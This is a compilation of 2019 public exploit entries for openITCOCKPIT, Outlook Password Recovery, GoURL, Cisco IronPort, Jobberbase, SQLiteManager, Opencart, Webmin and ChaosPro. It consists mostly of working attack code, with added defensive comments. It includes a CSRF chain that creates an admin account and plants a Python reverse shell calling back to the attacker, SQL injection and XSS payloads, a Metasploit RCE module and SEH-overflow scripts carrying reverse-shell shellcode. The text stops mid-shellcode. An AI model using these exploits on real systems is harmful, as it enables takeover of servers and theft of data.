# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE
# Google Dork: N/A
# Date: 26-08-2019
# Exploit Author: Julian Rittweger
# Vendor Homepage: https://openitcockpit.io/
# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2
# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases
# Version: 3.6.1-2
# Tested on: Debian 9
# CVE : 2019-10227
# Exploit Requirements: pip3 install bs4 requests && apt install netcat
#!/usr/bin/env python
# Defensive summary of the steps below: a logged-in administrator who opens
# the page hosted by this script submits a hidden form to /users/add that
# registers a new admin account (CSRF); the script then logs in with that
# account and chains /macros, /commands/add, /hosts/edit and
# /exports/launchExport so that a host check runs the macro value.  Per the
# header this is CVE-2019-10227, fixed in 3.7.1.  Detection: an unexpected
# user creation followed by macro, command and host edits from the same
# session in the application's audit trail.
import requests, urllib3, os
import http.server, socketserver
from bs4 import BeautifulSoup as bs
# Every request below passes verify=False; this only silences the warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print("""
--
openITCOCKPIT v.3.6.1-2
[CSRF 2 RCE]
--
""")
# Setup values
RHOST = input('[x] Enter IP of remote machine: ')
LHOST = input('[x] Enter IP of local machine: ')
# NOTE(review): despite its name RPORT is a *local* port - it is embedded in
# the macro value as the connect-back port and passed to nc at the end.
RPORT = int(input('[x] Enter local port (back-connection): '))
LPORT = int(input('[x] Enter local port (payload-hosting): '))
print('[-] Generating CSRF form using the following credentials: "hacked@oicp.app - letmein1337" ..')
# Generate file which serves CSRF payload
# (written to the current directory, which SimpleHTTPRequestHandler serves)
pl = open('./index.html', 'w')
# Register HTTP server
handler = http.server.SimpleHTTPRequestHandler
# HTML served to the victim: a hidden iframe plus a form posting to /users/add
# on RHOST, auto-submitted by the inline script, then a redirect to
# /login/logout after 3 s.  This is a runtime string and is left unchanged.
csrf = """
<iframe style="display:none;" name="csrff"></iframe>
<form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;">
<input type="text" name="_method" value="POST">
<input type="text" name="data[User][Container][]" value="1">
<input type="text" name="data[ContainerUserMembership][1]" value="2">
<input type="text" name="data[User][usergroup_id]" value="1">
<input type="text" name="data[User][status]" value="1">
<input type="text" name="data[User][email]" value="hacked@oicp.app">
<input type="text" name="data[User][firstname]" value="Mr">
<input type="text" name="data[User][lastname]" value="Nice">
<input type="text" name="data[User][new_password]" value="letmein1337">
<input type="text" name="data[User][confirm_new_password]" value="letmein1337">
<input type="submit">
</form>
<script>
function Redirect() {
window.location="https://""" + RHOST + """/login/logout";
}
document.forms[0].submit();
setTimeout('Redirect()', 3000);
</script>
"""
pl.write(csrf)
pl.close()
# Listens on all interfaces on LPORT.
httpd = socketserver.TCPServer(("", LPORT), handler)
# Start HTTP server, quit on keyboard interrupt
try:
    print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!')
    print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT))
    httpd.serve_forever()
except KeyboardInterrupt:
    httpd.socket.close()
print('\n[-] Starting exploitation ..')
print('[-] Logging in ..')
# Proceed login with generated credentials
# NOTE(review): indexing ['Set-Cookie'] raises KeyError when the login did
# not set a cookie (e.g. the CSRF step never ran); nothing checks for that.
c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : 'hacked@oicp.app', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie']
print('[!] Received cookie: ' + c.split(';')[0])
print('[-] Creating reverse-shell as macro ..')
# Insert a new macro identified as $USER99$
# Every authenticated request below reuses the value after '=' of the first
# cookie in the Set-Cookie header as the 'itnovum' session cookie.
makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1}
requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
print('[-] Inserting macro as command ..')
# Register a new command using the inserted macro
requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
# Scrape the host-check command list to learn which ID the new command got.
h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser')
ids = []
# Fetch current commands by ID
for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}):
    ids.append(i.get('action').split('/')[-1])
# NOTE(review): assumes the newest command is listed last; ids[-1] raises
# IndexError if no delete form was found.
print('[!] ID of command identified as: ' + str(ids[-1]))
print('[-] Updating default host ..')
# Update host, using the new malicious "hostcheck" command
# NOTE(review): several keys in this literal are repeated (notification_interval,
# notify_on_recovery, notify_on_unreachable, active_checks_enabled, check_interval,
# retry_interval); in a Python dict literal the last occurrence wins, so e.g.
# active_checks_enabled is sent as '1'.
sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0}
requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
# Refresh host configuration
print('[-] Refreshing host configuration ..')
requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'})
print('[!] Done! Enjoy your shell (popup in approx. 30s): ')
# We did it!
# Blocks in a local nc listener on RPORT, run through the shell via os.system.
os.system('nc -lvp ' + str(RPORT))
#Exploit Title: Outlook Password Recovery v2.10 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/outlook-password-recovery.html
# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
# Tested Version: v2.10
# Tested on: Windows 7 x64
# Windows XP SP3
# 1.- Run python code :Outlook Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open OUTLOOK Password Recovery and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the field 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
# Python 2 script (print statements).  Writes a 6000-byte run of 'A' (0x41)
# to Evil.txt; per the steps above, pasting that into the registration field
# crashes the product.  Defensive takeaway: the field accepts an unbounded
# string, so the fix is a length cap / bounds-checked copy on that input.
buffer = "\x41" * 6000
try:
    # NOTE(review): the file name is "Evil.txt" here while the steps above say
    # "EVIL.txt"; the case only matters on case-sensitive file systems.
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    # NOTE(review): a bare except hides the real cause (e.g. permission denied).
    print "File cannot be created"
<html>
<!--
GoURL Unrestricted Upload Vulnerability POC by @pouyadarabi
CWE-434
Vulnerable Function: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
Details:
After the file extension check, a substring of the file name (its first 95 characters) is used as the stored name (line #5655),
So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
will upload a file with a .php extension to the website :)
-->
<body>
<!--
Replace http://127.0.0.1/wp/ with target wordpress website
Fill id param in form action to any active download product
-->
<form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">
<input type="file" name="gourlimage2" />
<input type="submit"/>
</form>
<a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>
</body>
</html>
#!/usr/bin/perl -w
#
#
# Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
# Defensive summary: sends a single POST to the given URL with the Host header
# replaced by the string "Header-Injection" and prints the response headers,
# so any reflection of that value can be inspected.  Mitigation is for the
# appliance to validate the Host header against its configured names; a
# reverse proxy in front of it can reject Host values that do not match.
# Target URL from argv, with a default of a private address.
my $host = shift || 'https://192.168.1.1:443/';
print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
print ("===================================================================================\n");
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
# Usage message and exit unless the argument starts with "http".
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
# Random browser User-Agent from WWW::UserAgent::Random.
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
# verify_hostname => 0 disables TLS host name verification for the request.
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->cookie_jar($jar);
$browser->agent($user_agent);
# POST with a single-space body; Referer is set to the target URL itself.
my $request = HTTP::Request->new (POST => $host,
    [ Content_Type => "application/x-www-form-urlencoded" ,
      Referer => $host], " ");
# Override the Host header that LWP would derive from the URL.
$request->header("Host" => "Header-Injection");
my $content = $browser->request($request);
# Only the response headers are printed; the body is discarded.
print $content->headers_as_string();
# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
# Google Dork: N/A
# Date: 28, August 2019
# Exploit Author: Suvadip Kar
# Vendor Homepage: http://jobberbase.com/
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
# Version: 2.0
# Tested on: Linux
# CVE : N/A
--------------------------------------------------------------------------------
#POC - SQLi
#Request: http://localhost/[PATH]/jobs/jobs-in/
#Vulnerable Parameter: jobs-in (GET)
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ
#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
33,user()-- XYZ
<!--
# Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.sqlitemanager.org/
# Software Link: http://www.sqlitemanager.org/
# Version: SQLiteManager 1.2.0 (and 1.2.4)
# Tested on: All
# CVE : CVE-2019-9083
# Category: webapps
1. Description
SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
dbsel parameter. NOTE: This product is discontinued.
2. Proof of Concept
Detect:
http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072
http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070
Save the next post in a file: sqli.txt
POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1
Content-Length: 191
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;
SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;
SQLiteManager_fullText=0; SQLiteManager_HTMLon=0
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1
$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all
[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users
.....
.....
.....
3. Solution:
The product is discontinued; update to the latest version.
-->
# Exploit Title: Opencart 3.x.x Authenticated Stored XSS
# Date: 08/15/2019
# Exploit Author: Nipun Somani
# Author Web: http://thehackerstore.net
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart
# Version: 3.x.x
# Tested on: Debian 9, Windows 10 x64
# CVE : CVE-2019-15081
Description:
Opencart version 3.x.x allows editing the Source/HTML of the Categories /
Product / Information pages in the admin panel; this input is not sanitized,
which allows an attacker to execute arbitrary JavaScript code, leading to
Stored Cross-Site Scripting (XSS).
Proof-of-Concept(POC):
1. Log-in to admin-panel.
2. Navigate to Catalog and then select any of the [Categories or Products or Information] options and pick any entry or create one.
3. Under description click on Source option and insert your XSS payload.
i.e: "><script>alert("XSS")</script>
4. Now visit the modified page of your public website. And your injected XSS payload will execute.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Webmin < 1.930 RCE module (unserialise_variable() in web-lib-funcs.pl,
  # per the description below).  Both #check and #exploit authenticate with
  # WMUSER/WMPASS against /session_login.cgi and then POST an
  # "OBJECT CGI;..." body to /rpc.cgi with the sid cookie obtained from login.
  # Defensive notes: the fix is upgrading to Webmin 1.930 or later (module
  # title); POST bodies to /rpc.cgi beginning with "OBJECT CGI;" are the
  # request pattern to alert on, and the check leaves a response with the
  # custom Content-Type "text/metasploit" in web logs/proxies.
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the three options used below: WMPORT
  # (copied into RPORT at run time), WMUSER and WMPASS (defaults 'test').
  def initialize(info={})
    super(update_info(info,
      'Name' => "Webmin < 1.930 Remote Code Execution",
      'Description' => %q{
This exploit takes advantage of a code execution issue within the function
unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
The only prerequisite is a valid session id.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'James Bercegay', # Vulnerability Discovery
        ],
      'References' =>
        [
          [ 'URL', 'https://www.gulftech.org/' ]
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true
        },
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Targets' => [ ['Automatic', {}] ],
      'DisclosureDate' => '2019/08/30',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('WMPORT', [ true, "Webmin port", '10000']),
        OptString.new('WMUSER', [ true, "Webmin username", 'test']),
        OptString.new('WMPASS', [ true, "Webmin password", 'test']),
      ])
  end

  # Logs in with WMUSER/WMPASS, then POSTs a probe to /rpc.cgi whose only
  # effect is to print a custom Content-Type header; the host is reported as
  # Vulnerable only if that header comes back.
  # @return [Exploit::CheckCode] Vulnerable, or Safe on any failed step
  def check
    # Set Webmin port
    # NOTE(review): WMPORT is an OptString, so RPORT holds a String from here
    # on; the .to_s below keeps the Referer concatenation safe either way.
    datastore['RPORT'] = datastore['WMPORT']
    # Verbose
    print_status("Attempting to login")
    # Send login request
    res = send_request_cgi(
      {
        'uri' => '/session_login.cgi',
        'method' => 'POST',
        'vars_post' =>
          {
            'user' => datastore['WMUSER'],
            'pass' => datastore['WMPASS'],
            'save' => '1'
          },
        'cookie' => "redirect=1; testing=1; sessiontest=1;"
      })
    # If succesful cookie will be set
    if ( res and res.headers['Set-Cookie'] )
      # Do we have a valid SID?
      if ( /sid=/.match(res.headers['Set-Cookie']) )
        # Extract the SID
        # NOTE(review): this regex also requires a trailing ';' after the sid,
        # so a Set-Cookie ending right after the value would make match return
        # nil and [1] raise; confirm against Webmin's cookie format.
        sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
        print_good("Login was successful")
      else
        # No dice
        print_bad("Unable to login")
        return Exploit::CheckCode::Safe
      end
    else
      # No dice
      print_bad("Unexpected response")
      return Exploit::CheckCode::Safe
    end
    # Verbose
    print_status("Checking if host is vulnerable")
    # Try to execute arbitrary code
    # Referer is set to the target itself (presumably to satisfy a referer
    # check on the server side - not verifiable from this file).
    res = send_request_cgi({
      'uri' => '/rpc.cgi',
      'method' => 'POST',
      'headers' =>
        {
          'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
        },
      'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"',
      'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
    })
    # If it works our custom Content-Type will be set
    # NOTE(review): unlike the login step, res is not nil-checked here, so a
    # timeout from send_request_cgi raises instead of returning Safe.
    if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" )
      # Good
      return Exploit::CheckCode::Vulnerable
    else
      # Bad
      return Exploit::CheckCode::Safe
    end
  end

  # Same login sequence as #check, then sends the selected command payload
  # inside backticks in the /rpc.cgi body.  Returns early (nil) on login
  # failure; the response of the final request is not inspected.
  def exploit
    # Set Webmin port
    datastore['RPORT'] = datastore['WMPORT']
    # Verbose
    print_status("Attempting to login")
    # Send login request
    res = send_request_cgi(
      {
        'uri' => '/session_login.cgi',
        'method' => 'POST',
        'vars_post' =>
          {
            'user' => datastore['WMUSER'],
            'pass' => datastore['WMPASS'],
            'save' => '1'
          },
        'cookie' => "redirect=1; testing=1; sessiontest=1;"
      })
    # If succesful cookie will be set
    if ( res and res.headers['Set-Cookie'] )
      # Do we have a valid SID?
      if ( /sid=/.match(res.headers['Set-Cookie']) )
        # Extract the SID (same trailing-';' caveat as in #check)
        sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
        print_good("Login was successful")
      else
        # No dice
        print_bad("Unable to login")
        return
      end
    else
      # No dice
      print_bad("Unexpected response")
      return
    end
    # Verbose
    print_status("Sending selected payload")
    # Hex encode payload to prevent problems with the payload getting mangled
    # '\x' is single-quoted, i.e. a literal backslash followed by x, so the
    # result is a \xHH-escaped string of the encoded payload bytes.
    hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x')
    # Send selected payload
    res = send_request_cgi({
      'uri' => '/rpc.cgi',
      'method' => 'POST',
      'headers' =>
        {
          'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
        },
      'data' => 'OBJECT CGI;`' + hex + '`',
      'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
    })
  end
end
#!C:\Python27\python.exe
# Title : ChaosPro 2.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# Defensive summary: this Python 2 script writes a crafted ChaosPro.cfg under
# Program Files.  The "ProjectPath" line is padded far past its expected
# length and, per the author's comments, ends in an SEH overwrite - presumably
# triggered when the application parses the file (confirm).  The fix is a
# bounds-checked config parser; writes to that .cfg path by anything other
# than the application/installer are the thing to monitor.
# our egg!
payload = "T00WT00W"
#the payload
payload += (
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
    # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
    "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
    "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
    "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
    "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
    "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
    "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
    "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
    "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
    "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
    "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
    "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
    "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
    "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
    "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
    "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
    "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
    "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
    "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
    "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
    "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
    "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
    "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
    "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
    "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
    "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
    "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
    "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
    "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
    "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
    "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
    "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
    "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
    "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
    "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
    "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
    "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
    "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
    "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
    "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
    "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
    "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
    "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#this needs to be a backwards jump to give us room to call stack jump code
jmpbackD0 = "\x40\x75\xD0\x75"
jmpforward06 = "\x40\x75\x06\x75"
# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
# NOTE(review): `opencalc` is defined but never appended to `junk` below.
opencalc = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# our egghunter shellcode (the tag bytes 54 30 30 57 = "T00W" appear inline)
egghunter = (
    "\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
    "\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
    "\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
    "\xaf\x75\xe4\xff\xe7"
)
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
# Padding sized so that the total "ProjectPath" line lands the egghunter and
# the two jump stubs right before the SEH overwrite.
junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
junk += "A" * (118 - len(egghunter))
# egghunter (not the opencalc stub - the original "open calc" comment was stale)
junk += egghunter
# forward-6 then backward jump stubs; the backward byte here is 0xD0 (jmpbackD0),
# the "0xFF - 0x80" wording below was carried over from the 3.1 script.
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpbackD0
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\xab\x11\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)
#!C:\Python27\python.exe
# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# Defensive summary: this Python 2 script writes a crafted ChaosPro.cfg under
# Program Files.  The "ProjectPath" line is padded far past its expected
# length and, per the author's comments, ends in an SEH overwrite - presumably
# triggered when the application parses the file (confirm).  Because of the
# bad-character list below, the stage that reaches the egghunter is built
# from sub/and/push/pop sequences (zero_eax, align_stack, the \x2d runs)
# rather than written directly.  The fix is a bounds-checked config parser;
# writes to that .cfg path by anything other than the application/installer
# are the thing to monitor.
# our egg!
payload = "T00WT00W"
# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"
#the payload
payload += (
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
    # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
    "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
